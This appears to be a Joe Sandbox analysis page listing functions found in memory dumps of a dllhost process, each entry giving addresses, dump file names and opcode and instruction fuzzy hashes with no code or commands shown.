Function 00007FFD9BAD9241 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba46bda410e6a42d3460a715f9eb6d7eba392d42b4045f18acdac28cb487c16
Instruction ID: 13f1308f2e07d221e18b713154f203f07684a6706a78b76e778369229b4d6a87
Opcode Fuzzy Hash: fba46bda410e6a42d3460a715f9eb6d7eba392d42b4045f18acdac28cb487c16
Instruction Fuzzy Hash: 24016D30D1E64D8FEBA0EFA888596ED7BF0FF59300F4206A6D41CC61A2DBB496548B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE4731 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b6d30258ea172fac9f66f864b090bd3b017d93f7aab6710b975d92b297f522
Instruction ID: de620622d87f1c54252532b04a012e1f1324a06a6cb543e9a92beb94718c6889
Opcode Fuzzy Hash: 97b6d30258ea172fac9f66f864b090bd3b017d93f7aab6710b975d92b297f522
Instruction Fuzzy Hash: 42F04F30A1968C8FDB95EF58C858AED7BE0FF29301F4104AAE418C7265DB74D550CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADE7D5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a951c25809d692c24cccffa844c3e31d4f9df3829047856c9b816c9b5e5755
Instruction ID: 07c8c2d2eda1e6daaf340b115320bdcf81b87170ef497bca36756d0be17a6ec5
Opcode Fuzzy Hash: 16a951c25809d692c24cccffa844c3e31d4f9df3829047856c9b816c9b5e5755
Instruction Fuzzy Hash: F2F0A971A0E78D4FDB65DF5488696ED7FA0FF54310F0602BAE40CC61A2DA746554C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD9DD5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d43cb50f8170248740d90d6956a7ff43560db8667384da4cb44b4673a9dc22bf
Instruction ID: a5ac573a959a056fbb86bfa92b6efb47a9cf7aa2bc4a80895992f4dc1dfd1263
Opcode Fuzzy Hash: d43cb50f8170248740d90d6956a7ff43560db8667384da4cb44b4673a9dc22bf
Instruction Fuzzy Hash: 4AF0817190A38D8FDB55EF64C8595ED7BB0FF55304F0141BAE858C61A1DB3895A4CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0A79 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c0936be921ff903bd5e4d1635479e0b9c6bbafe59ec19fc21b7906c26d30c9b
Instruction ID: cbd76329a69f8da282ea693720f2da16d1c8c0b276ecef9016891e8223fc622b
Opcode Fuzzy Hash: 1c0936be921ff903bd5e4d1635479e0b9c6bbafe59ec19fc21b7906c26d30c9b
Instruction Fuzzy Hash: 8F01D421A1F7CD4FE7369B6448742F97FA0EF96700F4601A6D488C60F2D9685A94C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE46D1 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf157ef9df3a4f77a5af3cd514eccbb9e626d50e3eb4148cd91ba1791d54f617
Instruction ID: 911a6717252df8dbf51081299a024f26ad5ada66107f0c086dd5ae3969401261
Opcode Fuzzy Hash: cf157ef9df3a4f77a5af3cd514eccbb9e626d50e3eb4148cd91ba1791d54f617
Instruction Fuzzy Hash: A1F0903191D28D8FDB55EF6888546ED7BA0EF05300F0104BAE40CC72A2EB7496548B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD8BE1 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6c2866255b76ab8dc217169302effcb6138e94fee3447009471aa5174cf955
Instruction ID: 51de1b7e72ec5ea42c160483da11486f7c26eb705c6bc0397153224b3f274b05
Opcode Fuzzy Hash: ba6c2866255b76ab8dc217169302effcb6138e94fee3447009471aa5174cf955
Instruction Fuzzy Hash: CCF0B43190B64DCFDB659F5484612E93B60FF54700F41027AD44CC61E1DB799550C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADE705 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ef797b07f1225d31398bb4bf359f793beee3ffc87968371ab37d29c2cc3db1
Instruction ID: 90c0a1133de365302c56e338d750fbcc1099ad81365e3fefde7cbfe256f34a86
Opcode Fuzzy Hash: 47ef797b07f1225d31398bb4bf359f793beee3ffc87968371ab37d29c2cc3db1
Instruction Fuzzy Hash: 1DF0283190E78D8FEFA4DF5488256E97BA0FF50300F0605BAE46CC20E6DA78A1108B02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE4671 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9243a123da96817901d77696b2189ae4d75ccd229b01063025ab2723cf4c4559
Instruction ID: dabf143ac8583f45ea960bea0056c2ca473801a23d424f6441bdeb2717f9610d
Opcode Fuzzy Hash: 9243a123da96817901d77696b2189ae4d75ccd229b01063025ab2723cf4c4559
Instruction Fuzzy Hash: 75F06D30D1E68D8FDB51EF6488696EC7BE4FF05304F4104BAD41CC61A2DF7496548B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD8DA1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb47c4ec67536b053c04963af34c9728f0e933598fb7175e00fef15bd7da271b
Instruction ID: e8d92a4870bb47b08ae9a29aac89de386687d5b42b34a4f88d909f1f517bf79b
Opcode Fuzzy Hash: fb47c4ec67536b053c04963af34c9728f0e933598fb7175e00fef15bd7da271b
Instruction Fuzzy Hash: 06F0B431A1E68D8FEB51EF6488692ED7FF0FF54310F4606BAE488C20E2DA7496508700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE5F35 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f632787ec251e93798efa6b90f8d1a9dc5e71db83d330a5bfda68436e1e438f4
Instruction ID: b6f156a3af233d2902b2fad6bf8a858b4c3e9238aa75f44119768dd80e555d96
Opcode Fuzzy Hash: f632787ec251e93798efa6b90f8d1a9dc5e71db83d330a5bfda68436e1e438f4
Instruction Fuzzy Hash: 2CF0823189E2C81FD72757602C224E67F78DE43210B4A01E7E458CB4A3D95D675A83A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD8258 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1aecb8bb40034f32648e90800b0be115a2fe314edbce5b00eec954a667b7ec
Instruction ID: 64ddef0d9369c22299d9435f4219c097e76150aaf990462790e4fc9dcc2c890c
Opcode Fuzzy Hash: ae1aecb8bb40034f32648e90800b0be115a2fe314edbce5b00eec954a667b7ec
Instruction Fuzzy Hash: 99F0F930A1990E9EEBA0EFA998186FD76A4FB58300F410636E41DD21A0DA74A2508B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADEAE6 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c113f67e69677da9936f653d35e8303346983ec67df45ca8b42b8e90115f164
Instruction ID: d228852622b6106700af091e47be5254b3096ec761868205b3e2d1474917bbfe
Opcode Fuzzy Hash: 4c113f67e69677da9936f653d35e8303346983ec67df45ca8b42b8e90115f164
Instruction Fuzzy Hash: 51F09670E0D44D4EEF60E7A884567ECB7A2FF59300F410179D05DE3162CD6825448B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADCA89 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75b75e6e89a6d25fc555edf957863c75f98d3e3c1e4031540986c26bf1a19299
Instruction ID: b29fcda4d5e29823ae6cc81f9cad8400ebde7d9b0084275fe461f12273cf4d38
Opcode Fuzzy Hash: 75b75e6e89a6d25fc555edf957863c75f98d3e3c1e4031540986c26bf1a19299
Instruction Fuzzy Hash: 01F0623591E68C8FD752EF6488645E97FB0EF49300F4641F6E408C61B2EA789A54C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD19A5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d173bc6a9e8ab9d5ce425ac0d8ee6559ed65981e9a0fdc498f61e7f2ca14e7e
Instruction ID: 78357f9871100cd50e57bb941ea0b43a6da9ba6d85700d4f3ff235c632ba10f7
Opcode Fuzzy Hash: 1d173bc6a9e8ab9d5ce425ac0d8ee6559ed65981e9a0fdc498f61e7f2ca14e7e
Instruction Fuzzy Hash: EBF09630A0A64D8FDB20DFA8C8A57ED7BE0FF54304F00057AE85CC2191DA745250CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0A90 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9889105c3d074b15ff5d937a0703750d43af2e7cb61114e7832c9ef86b425d4d
Instruction ID: c197009f8cf08bfa79b6bfa4d4ec0b70b79bde1735ce1bffdd5683e135504407
Opcode Fuzzy Hash: 9889105c3d074b15ff5d937a0703750d43af2e7cb61114e7832c9ef86b425d4d
Instruction Fuzzy Hash: 7BF05930A1E64D8AE730AFA488782F97BE0EF95704F410175E48DC20F1DE742794C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADC9E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae1f7c5ff7c19370f141e59eabc67cf7f9dddd2f362d9ee214fab34e7573079
Instruction ID: c3cc448ca3808f397c57246658f0a48ffef55bc8c08784286e6709fe2b051381
Opcode Fuzzy Hash: 1ae1f7c5ff7c19370f141e59eabc67cf7f9dddd2f362d9ee214fab34e7573079
Instruction Fuzzy Hash: 06F0307091864DDFDB54EF68C849AE977F4FF48308F414566F81DC22A4DB34A1A0CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEC059 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b567fac8516e85c347afe6e30da52b7f280d87ac3a6690ba679bd2b090fbfa
Instruction ID: 88c90fff5d4930902cc13a8bb5b9b4d4840c042d6913997b8ef160c836c4e1bd
Opcode Fuzzy Hash: 78b567fac8516e85c347afe6e30da52b7f280d87ac3a6690ba679bd2b090fbfa
Instruction Fuzzy Hash: F7F06D3091E28D9FDB529F6888646EC7FB0FF56300F4600FAE548C71A2EA389A54C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD92AD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8326bb43e686740b044cca5954cc2941223b64e18bd2bad4d9e9939fa09eb8
Instruction ID: 1c149c2157aee3de2a8743ee549c36ebe5854654672affec1053936da020c624
Opcode Fuzzy Hash: da8326bb43e686740b044cca5954cc2941223b64e18bd2bad4d9e9939fa09eb8
Instruction Fuzzy Hash: C5F0B43091968D8FDB51EFA48868AED7FB4FF45300F4205EAE41DC20A2DA749660CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE0789 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d32c36b88d55b25d8ae4c843e855a1bba83a614a8d25f4f9e65a71c97695504
Instruction ID: 348d05c22976ca234781a121c7937b921df41fb9172407a64fcfd68f50371ea9
Opcode Fuzzy Hash: 2d32c36b88d55b25d8ae4c843e855a1bba83a614a8d25f4f9e65a71c97695504
Instruction Fuzzy Hash: 4AF0823094E78C9FDB62AB6488695E97FB0EF16300F1604E7E448C61B3E6789658CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEC299 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6456c388d3513bcbadb3377aa9eda237878107155ed6fe98b3e7a2bc416d7ef
Instruction ID: 70e09b15e3b84bf16de88de34e705f8ec67ed2c2354dc7ffbc771274ace591cc
Opcode Fuzzy Hash: a6456c388d3513bcbadb3377aa9eda237878107155ed6fe98b3e7a2bc416d7ef
Instruction Fuzzy Hash: 69F0823195E38D5FD752ABA888686EC7FB0EF16300F4604F7E548C71A3EA785648C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE6525 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd76e0c8a5cce67844221c8a3da777baf17d26d283550c358ebe6b0e52f3b84a
Instruction ID: 18c659f0d73215f5b602e607ee4e54d24f6687eb9cafbd241f61cb7c703cd484
Opcode Fuzzy Hash: cd76e0c8a5cce67844221c8a3da777baf17d26d283550c358ebe6b0e52f3b84a
Instruction Fuzzy Hash: 60E0E531A4E28D4FD726AF6888242E97B60FF45300F0505BAE158821E6EA799614CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADE63D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f168ad7721fac6a22b5418b346e08b4188f617d39399e9e3962d64a024782937
Instruction ID: 6ba03e63fa534fc6337e16cf35f0091c74f7c17b60f17f5a35a739903651ac4e
Opcode Fuzzy Hash: f168ad7721fac6a22b5418b346e08b4188f617d39399e9e3962d64a024782937
Instruction Fuzzy Hash: EEF0BB71E5F28D9FEB65AB6489766E87B90FF55300F0601F5D45C870E3DE3865048742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD8328 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b531e978e85ebf3b28ebf7d483b9cecabcdcfd4794f61f028e8dad39be04e9
Instruction ID: bc21bf9c2c70d1fe9c456c8ebc95a631b9e91905729dc046db7b72cb6ce51dde
Opcode Fuzzy Hash: 33b531e978e85ebf3b28ebf7d483b9cecabcdcfd4794f61f028e8dad39be04e9
Instruction Fuzzy Hash: 7CF0393096950D9BEB60EFA58858AFDB7B8FF48304F4145B6E81DC21A1DA74A2A08A00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADCAA0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188487c82fd8f21a06df05a5310d54a4234326001bba2cfb8b4a2d4ae3e76e5a
Instruction ID: 54ac1240d2f769ccccabd8542f491e88f0a47e3a16d59b90c0110fead161a3ca
Opcode Fuzzy Hash: 188487c82fd8f21a06df05a5310d54a4234326001bba2cfb8b4a2d4ae3e76e5a
Instruction Fuzzy Hash: F7E06D3092990D8FEB60EFA4D9186EDB7B4FF48304F414576E81CC21A0EA7466A4CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD8BA0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99c954b1b2cfbb262f9b83d22de2174b79f7124b25b2ca7c330d02cd80baff0
Instruction ID: 58340a0b39bb43bc5728b118a2287986f0ef775f1e1906b72c6b7a3e1b04c386
Opcode Fuzzy Hash: d99c954b1b2cfbb262f9b83d22de2174b79f7124b25b2ca7c330d02cd80baff0
Instruction Fuzzy Hash: 50E06D30E1994D8FEB50EF6488186EDB7A4FF08304F004576E81CC21A4DA3062A08B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD81C0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5c4d0f89c5e0cbd59c445f8af58f7b4d085ad2c6c02a1d07cb7a0647e41ed3
Instruction ID: 1f1ffd53a7babfa4c9ebd339d63ab56976d62c85e2ecaee8937ac0431c1fd9bd
Opcode Fuzzy Hash: 5d5c4d0f89c5e0cbd59c445f8af58f7b4d085ad2c6c02a1d07cb7a0647e41ed3
Instruction Fuzzy Hash: FAE06D3090A60ECFDB64AF6498113FA36A0FF84304F510639E41D821E0CBB9A260CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE7291 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a641dea70592ca0675373889ce72ec0b66838b53eb987edea451ef2eb69757e
Instruction ID: 723574811a6688c474978ac2f0241a7b02dc58471e27290a344d677ce8f05f7d
Opcode Fuzzy Hash: 1a641dea70592ca0675373889ce72ec0b66838b53eb987edea451ef2eb69757e
Instruction Fuzzy Hash: A3E04F3290F38CCBD7269B9089650EC7F61AF51300F5641FAE6494A1A2DA796B18D742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE265D Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7460155db87dd4af247b9f9802f48340e0cda45573ba7c376e841b8704120446
Instruction ID: 9383dbfcfd430ce14bd271ff32f63d4ce8a3e1e5c69da220dd2e6ec8b4c0f818
Opcode Fuzzy Hash: 7460155db87dd4af247b9f9802f48340e0cda45573ba7c376e841b8704120446
Instruction Fuzzy Hash: 8EE0653194F38D4FD775AFA488612E97B50FF05300F4701B5E55C861E2EBB99664C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD1250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: aeba83e1e230d9da8f7977468466de3d810b5b6a3923c1ee983cebe557862bc3
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: E7F03034A1910ECBEB64DB80D8609BD73B5FFD5700F114335D00AD25A1CEB86604C640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEBB0D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd1b6f2ac02177c380b2e4148ad0f475288d5d1a55c5b96608c66f053a9f4b9
Instruction ID: 26d2493bc50fa3c14708b76c66a1c0653636e90cfbb322296b2a85a4c6f78f7c
Opcode Fuzzy Hash: 0dd1b6f2ac02177c380b2e4148ad0f475288d5d1a55c5b96608c66f053a9f4b9
Instruction Fuzzy Hash: 26E02B3190F38D8FD725AF6089655E93B20FF41300F4101BAD558421D6DE785614C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: a214b01d4287fa2b98ac087252940ec4be61a7526003103423551b10d97c1316
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: EDE0ED34F4F40F8AE730ABA488745FE7274EF91B11F525B32D41A821A6DDBC6245CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADFF48 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb464f90f7875876ac174b37d5385adc6c1c4ee032207f79d925559ad94cb143
Instruction ID: 98103d35067b2aef13c64ddcc22a02a936d3fe755cdd48c86d3498cdc232cf94
Opcode Fuzzy Hash: cb464f90f7875876ac174b37d5385adc6c1c4ee032207f79d925559ad94cb143
Instruction Fuzzy Hash: B6E08C31A2451E4BDB00EF88E854AEDB3B0FF84324F400236F418D32D5DAB9AA408B90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD0C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 8da4bfe529b68b48c19ff1a96f1852166d247da8dc5dc6367f71543929a6604e
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
